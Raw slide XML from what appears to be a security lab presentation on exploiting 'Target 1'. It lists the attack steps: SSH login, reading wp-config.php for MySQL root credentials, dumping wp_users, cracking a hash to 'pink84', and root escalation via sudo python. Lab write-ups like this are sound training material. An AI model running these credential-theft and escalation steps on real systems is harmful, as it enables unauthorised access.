          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16998050" y="1759900"/>
            <a:ext cx="6648126" cy="5063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sz="5300"/>
              <a:t>Exploitation: V3 “User ID Susceptible to Brute Force Attacks (CWE-307)”</a:t>
            </a:r>
            <a:endParaRPr sz="5300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p3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221" name="Google Shape;221;p31"/>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Remote development/author access to Webserver1 (Target 1 VM)</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Google Shape;222;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322100" y="3113163"/>
            <a:ext cx="9315450" cy="10106025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="Google Shape;223;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9637538" y="3075063"/>
            <a:ext cx="9382125" cy="10182225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Google Shape;224;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12933000" y="3630133"/>
            <a:ext cx="11477301" cy="6901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sz="5800"/>
              <a:t>Exploitation: V4 “Root Password of the Database in the Config File”</a:t>
            </a:r>
            <a:endParaRPr sz="5800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p3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231" name="Google Shape;231;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514375" y="2295400"/>
            <a:ext cx="9124500" cy="8666700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="70000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability? </a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH into Michael’s account.</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Located the wp-config.php file and discovered the MySQL database login credentials.</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obtained database MySQL login credentials.</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900"/>
              <a:t>Commands:</a:t>
            </a:r>
            <a:endParaRPr sz="2900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh michael@192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find -iname wp-config.php</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /var/www/html/wordpress</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-357505" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat wp-config.php</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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32" name="Google Shape;232;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370000" y="1575600"/>
            <a:ext cx="16007649" cy="11763101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370000" y="1575600"/>
            <a:ext cx="7965000" cy="28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4" name="Google Shape;234;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370000" y="7911000"/>
            <a:ext cx="5400000" cy="1566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35" name="Google Shape;235;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772125" y="8271375"/>
            <a:ext cx="6033575" cy="482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Exploitation: “V5 Privilege Escalation via Sudo Python”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Google Shape;241;p3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242" name="Google Shape;242;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="1924650"/>
            <a:ext cx="22942800" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>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445135" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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First started the database with command: mysql -u root -p wordpress</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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In MySQL database, commands;</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445135" lvl="2" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Show tables;</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445135" lvl="2" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from wp_users;	</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445135" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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Extracted user Steven’s unsalted password hash from MySQL database saved to wp_hash.txt</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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Cracked the hash with John the Ripper</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445135" lvl="2" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password: “pink84”</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445135" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH into user Steven’s account</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445135" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escalated to root via sudo python</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="243" name="Google Shape;243;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13845875" y="7333250"/>
            <a:ext cx="9652943" cy="588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Exploitation: “V5 Privilege Escalation via Sudo Python”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p3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id="250" name="Google Shape;250;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1575600"/>
            <a:ext cx="15083168" cy="11519400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="251" name="Google Shape;251;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12625781" y="1764600"/>
            <a:ext cx="11425425" cy="490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Exploitation: “V5 Privilege Escalation via Sudo Python”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p3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id="258" name="Google Shape;258;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4904400" y="1726138"/>
            <a:ext cx="15083174" cy="2885813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Google Shape;259;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537963" y="4611950"/>
            <a:ext cx="11816050" cy="7324800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="260" name="Google Shape;260;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766325" y="10533475"/>
            <a:ext cx="1771650" cy="85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66" name="Google Shape;266;p3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67" name="Google Shape;267;p36"/>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Target 2</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68" name="Google Shape;268;p36"/>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Table of Contents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p1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16" name="Google Shape;116;p1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17" name="Google Shape;117;p1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This document contains the following resources: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="5956133"/>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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 1: Offensive Analysis</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203400"/>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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 2: Defe</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nsive Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="10450600"/>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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 3: Network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Exploitation: “V1 Brute-forceable URL directories and files”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p3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275" name="Google Shape;275;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="192465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indent="-508000" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
